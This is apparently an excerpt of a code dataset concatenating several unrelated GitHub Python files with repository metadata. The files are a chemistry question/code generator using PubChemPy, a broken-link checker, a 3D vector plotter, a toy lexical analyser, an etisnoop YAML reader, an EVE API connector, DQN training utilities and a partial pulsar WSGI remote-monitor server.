        question = f"if the {threshold_comp_name[0]} was over {generate_quantity}, we cool the mixture to {generated_temp} degrees, for {generated_duration} {unit}, how much of the initial reactors to get {desired_output} of the final product?"
    if None not in overheat_the(row):
        temp_threshold_str, loss_str, decrease_ratio_str, product_name = overheat_the(row)
        generated_temp = float(temp_threshold_str[0].split()[0]) + random.randint(-100, 100)
        generated_duration = random.randint(0, 10)
        unit = random.choice(["minutes", "hours"])
        question = f"if we heat the {product_name[0]} to {generated_temp} degrees, for {generated_duration} {unit}, how much of the initial reactors to get {desired_output} of the final product?"
    if None not in if_we_heat(row):
        temp_threshold_str, loss_str, name = if_we_heat(row)
        generated_temp = float(temp_threshold_str[0].split()[0]) + random.randint(-100, 100)
        generated_duration = random.randint(0, 10)
        unit = random.choice(["minutes", "hours"])
        question = f"if we heat the {name[0]} to {generated_temp} degrees, for {generated_duration} {unit}, how much of the initial reactors to get {desired_output} of the final product?"
    if None not in stirring_the_mixture_longer(row):
        loss_str, _, name = stirring_the_mixture_longer(row)
        name = name[0]
        generated_temp = random.randint(-100, 100)
        unit = random.choice(["minutes", "hours"])
        # Minute durations are multiples of 30 to read naturally.
        generated_duration = random.randint(1, 10) if unit == "hours" else random.choice([30 * i for i in range(20)])
        question = f"if we heat the {name} to {generated_temp} degrees, for {generated_duration} {unit}, how much of the initial reactors to get {desired_output} of the final product?"
    if None not in if_the_temperature_exceed(row):
        temp_threshold_str, loss_str, name = if_the_temperature_exceed(row)
        unit = random.choice(["minutes", "hours"])
        generated_duration = random.randint(1, 10) if unit == "hours" else random.choice([30 * i for i in range(20)])
        generated_temp = float(temp_threshold_str[0].split()[0]) + random.randint(-100, 100)
        question = f"if we heat the {name} to {generated_temp} degrees, for {generated_duration} {unit}, how much of the initial reactors to get {desired_output} of the final product?"
    if None not in if_we_cool_the_mixture(row):
        temp_threshold_str, loss_str, name = if_we_cool_the_mixture(row)
        unit = random.choice(["minutes", "hours"])
        generated_duration = random.randint(1, 10) if unit == "hours" else random.choice([30 * i for i in range(20)])
        generated_temp = float(temp_threshold_str[0].split()[0]) + random.randint(-50, 50)
        question = f"if we cool the {name} to {generated_temp} degrees, for {generated_duration} {unit}, how much of the initial reactors to get {desired_output} of the final product?"
    return generated_temp, temp_threshold_str, loss_str, str(
        generated_duration) + " " + unit, heat_duration_str, name, question
# --------- \end function for generating the question -------
def generate_question_type5(row):
    """Build a "how many moles does the process yield" question and its
    executable code template.

    Returns ("", "") when the product name cannot be validated as a chemical
    compound (blacklisted or not resolvable via PubChemPy — the lookup is a
    network round-trip used purely for validation).
    """
    vars_and_vals = get_reactors_and_output(row)
    question = "how many moles of the product does the process yield ?"
    try:
        if vars_and_vals[0][-1][0] in not_a_compound_list:
            raise NameError
        # Probe PubChem; the value itself is unused.
        validity_check = pcp.get_compounds(vars_and_vals[0][-1][0], 'name')[0].exact_mass
    except:
        # Bare except also absorbs TypeError from a (None, None) parse result.
        return "", ""
    code = f"molar_mass = pcp.get_compounds( \"{vars_and_vals[0][-1][0]}\", 'name')[0].exact_mass [EOL]" \
           f"molar_mass = float ( molar_mass ) [EOL]" \
           f"yielded_grams = to_gr(\" {vars_and_vals[0][-1][1]} \") [EOL]" \
           f"return yielded_grams / molar_mass [EOL]"
    return question, code
def generate_question_type6(row):  # debugged
    """Build a "how many moles of <reactor> do we need" question and its
    executable code template.

    Returns ("", "") when no reactor can be chosen or the chosen reactor is
    not a resolvable compound.

    Fix: the PubChemPy validation previously passed the one-element set
    ``{reactor_name}`` instead of the name string, so the lookup always
    failed and every call fell into the except branch; the bare name is now
    passed, matching the other question generators.
    """
    vars_and_vals = get_reactors_and_output(row)
    product_quantity = vars_and_vals[0][-1]
    desired_output = randomize_product_amount(vars_and_vals)
    try:
        reactor_chosen = random.choice(vars_and_vals[0][:-1])
    except:
        # random.choice raises on an empty reactor list.
        return "", ""
    reactor_name = reactor_chosen[0]
    reactor_weight = reactor_chosen[1]
    try:
        if reactor_name in not_a_compound_list:
            raise NameError
        # Probe PubChem; the value itself is unused.
        validity_check = pcp.get_compounds(reactor_name, 'name')[0].exact_mass
    except:
        return "", ""
    question = f"how many moles of {reactor_name} do we need to get {desired_output} of the product ?"
    code = f"desired_product = to_gr( ' {desired_output} ' ) [EOL]" \
           f"product_described = to_gr( ' {product_quantity[1]} ' ) [EOL]" \
           f"described_component = to_gr( ' {reactor_weight} ') [EOL]" \
           f"needed_reactor = desired_product / product_described * described_component [EOL]" \
           f"reactor_molar_weight = pcp.get_compounds( \"{reactor_name}\" , 'name')[0].exact_mass [EOL]" \
           f"return ( needed_reactor / float( reactor_molar_weight ) ) [EOL]"
    return question, code
def generate_question_type7(row):  # debugged
    """Build an "Is <atom> present in the product?" question and its
    executable code template.

    Returns ("", "") when the product name is blacklisted or cannot be
    resolved via PubChemPy (network lookup used only for validation).
    """
    vars_and_vals = get_reactors_and_output(row)
    # atoms_list is a module-level pool of candidate element names.
    chosen_atom = random.choice(atoms_list).strip()
    compound_name = vars_and_vals[0][-1][0].replace('.', '')
    try:
        if compound_name in not_a_compound_list:
            raise NameError
        # Probe PubChem; the value itself is unused.
        validity_check = pcp.get_compounds(compound_name, 'name')[0].elements
    except:
        return "", ""
    print("detected compound : ", compound_name)
    question = f"Is {chosen_atom} present in the product ?"
    code = f"chosen_atom = pcp.get_compounds( \" {chosen_atom} \" , 'name')[0].molecular_formula [EOL]" \
           f"product_elements = pcp.get_compounds( \"{compound_name}\" , 'name')[0].elements [EOL]" \
           f"return chosen_atom in product_elements [EOL]"
    return question, code
def generate_question_type1(row):  # debugged
    """Build a "how much of each reactor for <amount> of product" question
    and its executable code template.

    NOTE(review): the template computes ``portions_needed`` as
    desired_product / 100 rather than dividing by ``product_described`` —
    looks inconsistent with generate_question_type3; confirm intended.
    """
    vars_and_vals = get_reactors_and_output(row)
    desired_output = randomize_product_amount(vars_and_vals)
    question_1 = f"how much do we need from each of the reactors to get {desired_output} of the final product ?"  # TODO V2 : add an environmental condtion
    code_1 = f"desired_product = to_gr( \" {desired_output} \" )[EOL]" \
             f"components = {vars_and_vals[0][:-1]} [EOL]" \
             f"product_described = to_gr( \" {vars_and_vals[1]} \" )[EOL]" \
             f"portions_needed = ( desired_product ) /100 [EOL]" \
             f"needed_reactors = [[reactor [ 0 ] , to_gr( reactor [ 1 ] ) * portions_needed] for reactor in components] [EOL]" \
             f"return needed_reactors [EOL]"
    code_1 = formulate_code(code_1)
    return question_1, code_1
def generate_question_type2(row):  # debugged
    """Build an "optimize the process given what we have" question and its
    executable code template (find the limiting portion, then the leftovers).

    Returns ("", "") when the parse produced no reactors.
    """
    vars_and_vals = get_reactors_and_output(row)
    q_vars, q_list = generate_reactors(vars_and_vals[0][:-1])
    # Swap to [amount, name] order expected by the generated code.
    q_list = [[q[1], q[0]] for q in q_list]
    if len(vars_and_vals[0][:-1]) < 1:
        return "", ""
    question2 = f"we have {q_vars}, how can we optimize the process?"  # TODO V2 : add an environmental conditions
    code_2 = f"components = {vars_and_vals[0][:-1]} [EOL]" \
             f"have_components = {q_list} [EOL]" \
             f"min_portion = float( 'inf' ) [EOL]" \
             f"for component, needed in zip ( components , have_components ) : [EOL]" \
             f"[TAB]portions = to_gr( component [ 1 ] ) / to_gr( needed [ 1 ] ) [EOL]" \
             "[TAB]if portions < min_portion : [EOL]" \
             "[TAB][TAB]min_portion = portions [EOL]" \
             "optimized = [] [EOL]" \
             "for need, have in zip ( components , have_components ) : [EOL]" \
             "[TAB]optimized.append( [ have[0] , to_gr( have [1] ) - to_gr ( need [1] ) * min_portion ] ) [EOL]" \
             "return optimized [EOL]"
    code_2 = formulate_code(code_2)
    return question2, code_2
def generate_question_type3(row):  # debugged
    """Build a "how much product can we create from what we have" question
    and its executable code template (limiting-reagent computation)."""
    vars_and_vals = get_reactors_and_output(row)
    q_vars, q_list = generate_reactors(vars_and_vals[0][:-1])
    question_3 = f"we have {q_vars} how much can we create of the final product?"  # TODO V2 : add an environmental conditions
    code_3 = f"available_reactors = {get_vars_from_question(q_vars)} [EOL]" \
             f"components = {vars_and_vals[0][:-1]} [EOL]" \
             f"product_described = to_gr( \" {vars_and_vals[1]} \" ) [EOL]" \
             f"minimal_product_portion = float( 'inf' ) [EOL]" \
             f"for needed, have in zip ( components , available_reactors ): [EOL]" \
             f"[TAB]tmp_min_portion = to_gr( have [ 1 ] ) / to_gr( needed[1] ) [EOL]" \
             f"[TAB]if tmp_min_portion < minimal_product_portion : [EOL]" \
             f"[TAB][TAB]minimal_product_portion = tmp_min_portion [EOL]" \
             f"return minimal_product_portion * product_described [EOL]"
    code_3 = formulate_code(code_3)
    return question_3, code_3
def generate_question_type4(row):  # CONTINUE HEREEEE
    """Build a duration/temperature-conditioned question and its code
    template (work in progress, per the marker above).

    NOTE(review): ``heat_duration_str`` is only produced by the first
    template in generate_duration, so every other context returns
    (None, None). ``heat_duration_str`` and ``temp_threshold_str`` are
    lists interpolated directly into the template, and ``answe_4 =
    execute`` references a name not defined in this chunk — it would raise
    NameError unless ``execute`` exists elsewhere in the file; confirm.
    """
    vars_and_vals = get_reactors_and_output(row)
    desired_output = randomize_product_amount(vars_and_vals)
    generated_temp, temp_threshold_str, loss_str, generated_duration, heat_duration_str, name, question_4 = generate_duration(
        row, desired_output)
    if heat_duration_str is None:
        return None, None
    code_4 = f"time = to_minute( \" {get_time_from_question(question_4)} \" ) [EOL]" \
             f"loss = \'{loss_str[0]}\' [EOL]" \
             f"components = {vars_and_vals[0][:-1]} [EOL]" \
             f"described_product_amount = to_gr( \" {desired_output} \" ) [EOL]" \
             f"threshold_duration = to_minute( \" {heat_duration_str} \" ) [EOL]" \
             f"temprature = {generated_temp} [EOL]" \
             f"threshold_temp = {temp_threshold_str} [EOL]" \
             f"final_product_amount = described_product_amount [EOL]" \
             f"for t in range( time ): [EOL]" \
             f"[TAB]if t > threshold_duration and temprature > threshold_temp: [EOL]" \
             f"[TAB][TAB]final_product_amount = compensate_for_loss( loss= loss[0], current_value= final_product_amount) [EOL]" \
             f"portions = final_product_amount / described_product_amount [EOL]" \
             f"return [[component[0], to_gr(component[1]) * portions] for component in components] [EOL]"
    code_4 = formulate_code(code_4)
    answe_4 = execute
    return question_4, code_4
# Entry point: load the GPT-4-parsed USPTO reaction contexts and generate a
# question/code pair of each type per record (only the type-4 code is
# printed here).
data = json.load(open("gpt4-parsed-uspto.json", "r", encoding="utf-8"))  # NOTE(review): file handle is never closed
for idx, entry in enumerate(data):
    q1, c1 = generate_question_type1(row=entry)
    q2, c2 = generate_question_type2(row=entry)
    q3, c3 = generate_question_type3(row=entry)
    q4, c4 = generate_question_type4(row=entry)
    print(c4)
| arrafmousa/generate_code | generate_questiontion_with_chempy.py | generate_questiontion_with_chempy.py | py | 25,754 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "re.search",
"line_number": 137,
"usage_type": "call"
},
{
"api_name": "re.search",
"line_number": 140,
"usage_type": "call"
},
{
"api_name": "re.findall",
"line_number": 142,
"usage_type": "call"
},
{
"api_name": "re.findall",
"line_number": 143... |
74473073385 | import urllib.request, urllib.parse
import bs4 as BeautifulSoup

# Ask the user for the page to check.
base = input("Enter the URL: ")
try:
    page = urllib.request.urlopen(base)
except:
    print("Cannot open %s" % base)
    quit()

# Parse the page into a soup.
soup = BeautifulSoup.BeautifulSoup(page)

# Extract the links as (name, target) tuples.
links = [(link.string, link['href']) for link in soup.find_all("a") if link.has_attr("href")]

# Try to open every link.
broken = False
for name, url in links:
    # Join the target onto the base because in-page links are relative,
    # e.g. base=http://hanwen.me url=/about
    #      dest = http://hanwen.me/about
    dest = urllib.parse.urljoin(base, url)
    print(dest)
    try:
        page = urllib.request.urlopen(dest)
        page.close()
    except:
        # NOTE(review): bare except also swallows KeyboardInterrupt here.
        print("Link \"%s\" to \"%s\" is probably broken." %(name, dest))
        broken = True

# Report the good news.
if not broken:
print("Page %s does not seem to have broken links. " %base) | zhanwen/PythonDataScience | chapter3/practice/Solution_Broken_link.py | Solution_Broken_link.py | py | 1,067 | python | en | code | 20 | github-code | 36 | [
{
"api_name": "urllib.request.request.urlopen",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "urllib.request.request",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "urllib.request",
"line_number": 7,
"usage_type": "name"
},
{
"api_name":... |
6171283144 | import matplotlib.pyplot as plt
import numpy as np
from numpy import *
from mpl_toolkits import mplot3d
import random
# Presets
ax = plt.axes(projection='3d')
def randomcolor():
    """Return a random hex colour string such as "#3FA7C2".

    The digit "0" is intentionally absent from the candidate set, matching
    the original palette of 15 characters.
    """
    palette = ['1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C', 'D', 'E', 'F']
    return "#" + "".join(random.choice(palette) for _ in range(6))
class Group(object):
    """A collection of 3-D column vectors drawn on the shared module-level
    axes ``ax`` and rotated together about the z-axis."""

    def __init__(self):
        # Registered vectors; each is expected to be a (3, 1) column ndarray.
        self.vectors = []

    def register(self, *v: ndarray):
        """Append any number of column vectors to the group."""
        for i in v:
            self.vectors.append(i)

    def display(self):
        """Draw every vector as an origin arrow plus an end-point marker,
        all sharing one randomly chosen colour per call."""
        temp = []
        color_p = randomcolor()
        for i in self.vectors:
            # Flatten the column vector into [x, y, z].
            for j in range(len(i)):
                temp.append(i[j])
            ax.quiver(0, 0, 0, temp[0], temp[1], temp[2], arrow_length_ratio=0.1, color=color_p)
            ax.scatter3D(temp[0], temp[1], temp[2], color=color_p, s=2500)
            temp = []

    def rotate(self, theta: float):
        """Rotate every registered vector in place by ``theta`` radians
        about the z-axis."""
        rotation_matrix = array([[np.cos(theta), -np.sin(theta), 0], [np.sin(theta), np.cos(theta), 0], [0, 0, 1]])
        for i in range(len(self.vectors)):
            self.vectors[i] = dot(rotation_matrix, self.vectors[i])
def initial():
    """Draw the three coordinate axes through the origin, clamp the view box
    to [-2, 2]^3 with equal aspect, and show the figure (blocks until the
    window is closed)."""
    x = np.arange(-6, 6, 0.1)
    y = np.zeros(120)
    # Axis lines: x-, y- and z-axis in black.
    ax.plot(x, y, y, color='#000000')
    ax.plot(y, x, y, color='#000000')
    ax.plot(y, y, x, color='#000000')
    ax.set_xlim(-2, 2)
    ax.set_ylim(-2, 2)
    ax.set_zlim(-2, 2)
    plt.gca().set_box_aspect((1, 1, 1))
    plt.show()
def main():
    """Demo: register the four vertex vectors of a regular tetrahedron,
    draw them, rotate the group by pi/6 about the z-axis, draw again, then
    render the scene."""
    a1 = array([[1], [1], [1]])
    a2 = array([[-1], [-1], [1]])
    a3 = array([[1], [-1], [-1]])
    a4 = array([[-1], [1], [-1]])
    G1 = Group()
    G1.register(a1, a2, a3, a4)
    G1.display()
    G1.rotate(pi / 6)
    G1.display()
    initial()


if __name__ == '__main__':
    main()
| RS-gty/GTY_Chemistry | Group.py | Group.py | py | 1,802 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "matplotlib.pyplot.axes",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "random.randint",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "numpy.cos",
... |
14431724379 | #from ast import If
#from pprint import pp
#from typing import final
from doctest import master
from multiprocessing.reduction import duplicate
import re
import string
from struct import pack
from unittest import result
from tokens import tokens
from tkinter import *
from tkinter import ttk
#from Interfaz import datos
resultReservadas = []
resultCaracteresEspeciales = []
resultDelimitadores = []
resultIndefinidas = []
resultErrores = []
resultDigitos = []
listResultados = []
class analizador:
    """Ad-hoc lexical analyser: classifies input tokens into reserved words,
    special characters, delimiters, identifiers, digits and errors."""

    # NOTE(review): `tokens` is the class imported via `from tokens import
    # tokens`; this class attribute shadows it with an instance inside the
    # class namespace, while the methods below still read the class through
    # the module-level name.
    tokens = tokens()

    def inicio_analizador(self, palabras):
        """Classify every token of `palabras` and return the six result
        lists (also appended into the module-level `listResultados`).

        WARNING(review): recognised tokens are removed from `palabras`
        while it is being iterated, which can skip the element right after
        each removal, and `listResultados` keeps growing across calls.
        """
        resultReservadas = []
        resultCaracteresEspeciales = []
        resultDelimitadores = []
        resultDigitos = []
        resultIndefinidas = []
        resultErrores = []
        print("--- Lexico ---")
        # Reserved words.
        for i in tokens.reservadas:
            for j in palabras:
                if (i == j):
                    resultReservadas.append(i)
                    palabras.remove(i)
        # Special characters.
        for l in tokens.caracteres_especiales:
            for k in palabras:
                if (l == k):
                    resultCaracteresEspeciales.append(k)
                    palabras.remove(l)
        # Delimiters.
        for t in tokens.delimitadores:
            for f in palabras:
                if (t == f):
                    resultDelimitadores.append(t)
                    palabras.remove(t)
        # Whatever remains is an identifier (>= 2 letters), a number, or an
        # error.
        for g in range (len(palabras)):
            #dato = re.search("^[A-Za-z]+$*", palabras[g])
            dato = re.search("^[a-zA-Z][a-zA-Z]+$", palabras[g])
            if dato:
                resultIndefinidas.append(palabras[g])
            else:
                dato1 = re.search("^[0-9]+$", palabras[g])
                if dato1:
                    resultDigitos.append(palabras[g])
                else:
                    resultErrores.append(palabras[g])
        print("Token Reservadas: ",resultReservadas)
        print("Token Caracteres Especiales: ",resultCaracteresEspeciales)
        print("Token Delimitadores: ",resultDelimitadores)
        print("Token Indefinidas: ",resultIndefinidas)
        print("Token Digitos: ",resultDigitos)
        print("Errores: ",resultErrores)
        listResultados.append(resultReservadas)
        listResultados.append(resultCaracteresEspeciales)
        listResultados.append(resultDelimitadores)
        listResultados.append(resultIndefinidas)
        listResultados.append(resultDigitos)
        listResultados.append(resultErrores)
        return listResultados

    def funcAuxiliar(self, palabras):
        """Syntactic sanity check for one fixed expected program shape:
        counts specific terminals and, only when every expected count is
        met exactly, removes them from `palabras`.

        WARNING(review): this method appends into the module-level result
        lists, so repeated calls accumulate stale tokens and skew counts.
        """
        # Collect the terminal tokens into the (module-level) result lists.
        for i in tokens.reservadas:
            for j in palabras:
                if (i == j):
                    resultReservadas.append(i)
        for l in tokens.caracteres_especiales:
            for k in palabras:
                if (l == k):
                    resultCaracteresEspeciales.append(k)
        for t in tokens.delimitadores:
            for f in palabras:
                if (t == f):
                    resultDelimitadores.append(t)
        # Count how many of each expected terminal are present.
        c = 0
        s = 0
        p = 0
        d = 0
        cs = 0
        i = 0
        pa = 0
        pc = 0
        dp = 0
        up = 0
        for cantidadReservadas in resultReservadas:
            if cantidadReservadas == "class":
                print("encontro un class")
                c += 1
            if cantidadReservadas == "self":
                print("encontro un self")
                s += 1
            if cantidadReservadas == "print":
                print("encontro un print")
                p += 1
            if cantidadReservadas == "def":
                print("encontro un def")
                d += 1
        for cantidadCaracteres in resultCaracteresEspeciales:
            if cantidadCaracteres == "'":
                print("encontro un ' ")
                cs += 1
        for cantidadDelimitadores in resultDelimitadores:
            if cantidadDelimitadores == "=":
                print("encontro un = ")
                i += 1
            if cantidadDelimitadores == "(":
                print("encontro un ( ")
                pa += 1
            if cantidadDelimitadores == ")":
                print("encontro un ) ")
                pc += 1
            if cantidadDelimitadores == ":":
                print("encontro un : ")
                dp += 1
            if cantidadDelimitadores == ".":
                print("encontro un . ")
                up += 1
        # Expected exact shape: 1 class, 1 self, 1 print, 1 def, 2 quotes,
        # 2 '=', 5 '(', 5 ')', 1 ':' and 1 '.'.
        if c == 1 and s == 1 and p == 1 and d == 1 and cs == 2 and i == 2 and pa == 5 and pc == 5 and dp == 1 and up == 1:
            print("CUMPLE")
            palabras.remove("class")
            palabras.remove("self")
            palabras.remove("def")
            palabras.remove("print")
            palabras.remove("'")
            palabras.remove("'")
            palabras.remove("=")
            palabras.remove("=")
            palabras.remove("(")
            palabras.remove("(")
            palabras.remove("(")
            palabras.remove("(")
            palabras.remove("(")
            palabras.remove(")")
            palabras.remove(")")
            palabras.remove(")")
            palabras.remove(")")
            palabras.remove(")")
            palabras.remove(":")
            palabras.remove(".")
            print(palabras)
        else:
            print("NO CUMPLE")
        #print("Existentes REPETIDOS:", existentes)
        #print("Reservadas: ",resultReservadas)
        #print("Caracteres especiales: ",resultCaracteresEspeciales)
        #print("Delimitadores: ",resultDelimitadores)
        #print(palabras)
| AngelHernandez20/191180-191280 | analizadorlexico.py | analizadorlexico.py | py | 5,673 | python | es | code | 0 | github-code | 36 | [
{
"api_name": "tokens.tokens",
"line_number": 24,
"usage_type": "name"
},
{
"api_name": "tokens.tokens.reservadas",
"line_number": 34,
"usage_type": "attribute"
},
{
"api_name": "tokens.tokens",
"line_number": 34,
"usage_type": "name"
},
{
"api_name": "tokens.toke... |
71234511143 | #!/usr/bin/env python
#
# An example on how to read the YAML output from etisnoop
# Pipe etisnoop to this script
#
# License: public domain
import sys

import yaml

# safe_load_all avoids arbitrary Python object construction on untrusted
# YAML input, and plain load_all without an explicit Loader argument is
# rejected by PyYAML >= 6 (and warns since 5.1).
for frame in yaml.safe_load_all(sys.stdin):
    print("FIGs in frame {}".format(frame['Frame']))
    for fib in frame['LIDATA']['FIC']:
        if fib['FIGs']:
            for fig in fib['FIGs']:
                print(" FIG " + fig['FIG'])
| Opendigitalradio/etisnoop | yamlexample.py | yamlexample.py | py | 401 | python | en | code | 8 | github-code | 36 | [
{
"api_name": "yaml.load_all",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "sys.stdin",
"line_number": 11,
"usage_type": "attribute"
}
] |
71514879785 | import sys
import time
import numpy as np
import torch
import torch.nn as nn
class RewardTracker:
    """Aggregates episode rewards/steps in groups, prints progress, logs
    TensorBoard scalars, and signals when the rolling mean reward crosses
    ``stop_reward``. Intended for use as a context manager."""

    def __init__(self, writer, stop_reward, group_rewards=1):
        # writer: a SummaryWriter-like object with add_scalar()/close().
        self.writer = writer
        self.stop_reward = stop_reward
        # Buffers accumulating episodes until a full group is collected.
        self.reward_buf = []
        self.steps_buf = []
        self.group_rewards = group_rewards

    def __enter__(self):
        # Timing state for the frames-per-second estimate.
        self.ts = time.time()
        self.ts_frame = 0
        self.total_rewards = []
        self.total_steps = []
        return self

    def __exit__(self, *args):
        self.writer.close()

    def reward(self, reward_steps, frame, epsilon=None):
        """Record one (reward, steps) episode at frame index ``frame``.

        Returns True once the mean reward over the last 100 groups exceeds
        ``stop_reward``, False otherwise (including while a group is still
        filling up).
        """
        reward, steps = reward_steps
        self.reward_buf.append(reward)
        self.steps_buf.append(steps)
        # Wait until a full group has been collected before reporting.
        if len(self.reward_buf) < self.group_rewards:
            return False
        reward = np.mean(self.reward_buf)
        steps = np.mean(self.steps_buf)
        self.reward_buf.clear()
        self.steps_buf.clear()
        self.total_rewards.append(reward)
        self.total_steps.append(steps)
        speed = (frame - self.ts_frame) / (time.time() - self.ts)
        self.ts_frame = frame
        self.ts = time.time()
        mean_reward = np.mean(self.total_rewards[-100:])
        mean_steps = np.mean(self.total_steps[-100:])
        epsilon_str = "" if epsilon is None else ", eps %.2f" % epsilon
        print("%d: done %d games, mean reward %.3f, mean steps %.2f, speed %.2f f/s%s" % (
            frame, len(self.total_rewards)*self.group_rewards, mean_reward, mean_steps, speed, epsilon_str
        ))
        sys.stdout.flush()
        if epsilon is not None:
            self.writer.add_scalar("epsilon", epsilon, frame)
        self.writer.add_scalar("speed", speed, frame)
        self.writer.add_scalar("reward_100", mean_reward, frame)
        self.writer.add_scalar("reward", reward, frame)
        self.writer.add_scalar("steps_100", mean_steps, frame)
        self.writer.add_scalar("steps", steps, frame)
        if mean_reward > self.stop_reward:
            print("Solved in %d frames!" % frame)
            return True
        return False
def calc_values_of_states(states, net, device="cpu"):
    """Return the mean best-action value ``net`` predicts over ``states``.

    The states are evaluated in 64 sub-batches to bound memory use; for
    each state only the maximum action value is kept, and the per-batch
    means are averaged into a single scalar. Useful for tracking learning
    progress on a fixed held-out state set.
    """
    batch_means = []
    for chunk in np.array_split(states, 64):
        q_values = net(torch.tensor(chunk).to(device))
        best_per_state = q_values.max(1)[0]
        batch_means.append(best_per_state.mean().item())
    return np.mean(batch_means)
def unpack_batch(batch):
    """Split experience objects into per-field numpy arrays.

    Returns (states, actions, rewards, dones, last_states). Terminal
    transitions (``exp.last_state is None``) store the current state in
    the last-state slot; the corresponding ``dones`` flag is set so the
    placeholder gets masked out later.
    """
    states, actions, rewards, dones, last_states = [], [], [], [], []
    for exp in batch:
        current = np.array(exp.state, copy=False)
        states.append(current)
        actions.append(exp.action)
        rewards.append(exp.reward)
        terminal = exp.last_state is None
        dones.append(terminal)
        last_states.append(current if terminal else np.array(exp.last_state, copy=False))
    return (np.array(states, copy=False), np.array(actions),
            np.array(rewards, dtype=np.float32),
            np.array(dones, dtype=np.uint8),
            np.array(last_states, copy=False))
def calc_loss(batch, net, tgt_net, gamma, device="cpu"):
    """Double-DQN MSE loss for a batch of transitions.

    The online ``net`` selects the arg-max action for each next state while
    ``tgt_net`` evaluates its value; terminal next-states are zeroed via
    ``done_mask`` before forming the bootstrap target.
    """
    states, actions, rewards, dones, next_states = unpack_batch(batch)

    states_v = torch.tensor(states).to(device)
    next_states_v = torch.tensor(next_states).to(device)
    actions_v = torch.tensor(actions).to(device)
    rewards_v = torch.tensor(rewards).to(device)
    done_mask = torch.tensor(dones, dtype=torch.bool).to(device)

    # Q(s, a) of the action actually taken.
    state_action_values = net(states_v).gather(1, actions_v.unsqueeze(-1)).squeeze(-1)
    # Action chosen by the online net, value read from the target net.
    next_state_actions = net(next_states_v).max(1)[1]
    next_state_values = tgt_net(next_states_v).gather(1, next_state_actions.unsqueeze(-1)).squeeze(-1)
    next_state_values[done_mask] = 0.0
    # detach(): no gradients flow into the bootstrap target.
    expected_state_action_values = next_state_values.detach() * gamma + rewards_v
    return nn.MSELoss()(state_action_values, expected_state_action_values)
| a046829713/DQNStockSysteam | lib/common.py | common.py | py | 5,518 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "time.time",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "numpy.mean",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "numpy.mean",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "time.time",
"line_number": 39,
... |
26224523041 | import xml.etree.ElementTree as ET
import time
import requests
class BaseAPIConnector(object):
    """Base class for simple XML/JSON HTTP APIs: subclasses override
    ``construct_url`` and inherit the retrying fetch helpers."""

    def __init__(self, user_agent='', verbose=False):
        self.user_agent = user_agent
        self.verbose = verbose

    def construct_url(self):
        # Overridden by subclasses; the base provides no URL.
        return None

    def html_request(self):
        """GET ``construct_url()`` with up to 10 retries, 10 s apart.

        Returns the ``requests`` response, or None when every attempt
        raised. Raises UserWarning if no user agent was configured.
        """
        if self.user_agent == '':
            raise UserWarning('Please specify a user agent.')
        url = self.construct_url()
        if self.verbose:
            print(url)
        request = None
        exception_count = 0
        while exception_count < 10:
            try:
                request = requests.get(url, headers={'User-Agent': self.user_agent})
            except Exception as e:
                print("Exception '%s' while querying url: '%s', trying again..." % (e, url))
                time.sleep(10)
                exception_count += 1
            else:
                break
        return request

    def get_xml_from_url(self):
        """Parse the response body as XML; None on any failure.

        NOTE(review): the bare except hides parse errors and the
        AttributeError raised when html_request() returned None alike.
        """
        try:
            return ET.fromstring(self.html_request().text)
        except:
            return None
def get_json_from_url(self):
return self.html_request().json() | TheOneWho/EveCommonLibrary | EveCommon/BaseAPIConnector.py | BaseAPIConnector.py | py | 1,149 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "requests.get",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "time.sleep",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "xml.etree.ElementTree.fromstring",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "xml.etree.El... |
20026451101 | from hashlib import sha1
import time
import json
from pulsar import get_actor, Future
from pulsar.apps.wsgi import WSGIServer, WsgiResponse, WsgiHandler
import aio_etcd as etcd
from jirachi.io.abstract import JirachiMonitor, JirachiMonitorNotFound
from pulsar.apps.wsgi import Router
__all__ = ['RemoteMonitorWSGI']
blueprint = Router('/')
@blueprint.router('/remote/<string:monitor>/event/<string:event>/', methods=['post'])
async def remote_wsgi(request):
    """POST handler: forward the request body as event ``event`` to actor
    ``monitor`` (or to this actor's own monitor) and answer with a JSON
    receipt containing a SHA-1 token."""
    # Per-request token derived from the clock; not security-sensitive.
    hash_code = sha1(str(time.time()).encode()).hexdigest()
    monitor_name = request.urlargs['monitor']
    event_name = request.urlargs['event']
    data = request.body_data
    actor = get_actor()
    monitor = actor.get_actor(monitor_name)
    if monitor:
        monitor.fire_event(event_name, data)
    elif not (actor.is_arbiter() or actor.is_monitor() and actor.monitor == monitor):
        # NOTE(review): `monitor` is falsy on this branch, so the comparison
        # above is effectively against None — confirm the intended routing
        # condition.
        actor.monitor.fire_event(event_name, msg=data)
    else:
        raise JirachiMonitorNotFound('Cant found Monitor %s' % monitor)
    return WsgiResponse(200, json.dumps({
        'successed': True,
        'token': hash_code
    }))
class RemoteMonitorWSGI(WSGIServer, JirachiMonitor):
    """WSGI server application exposing pulsar monitor events over HTTP,
    with an etcd client attached at monitor start."""
    name = 'remote_monitor'
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Serve all HTTP requests through the module-level blueprint router.
        self.cfg.callable = WsgiHandler((blueprint, ))
        if not hasattr(self.cfg, 'blacklist'):
            self.cfg.blacklist = []
    @staticmethod
    async def singlecast(msg, actor_name):
        """Deliver *msg* to the named actor via its 'singlecast' event and
        return a Future stored on the actor for the reply."""
        actor = get_actor()
        if not actor.name == actor_name:
            actor = actor.get_actor(actor_name)
        # NOTE(review): when ``actor`` is falsy this line still dereferences
        # ``actor.monitor`` and would raise — looks like a latent bug; confirm
        # the intended fallback before changing.
        if not actor and actor.monitor.name == actor.name:
            actor = actor.monitor
        actor.fire_event('singlecast', msg)
        actor.future = Future()
        return actor.future
    @staticmethod
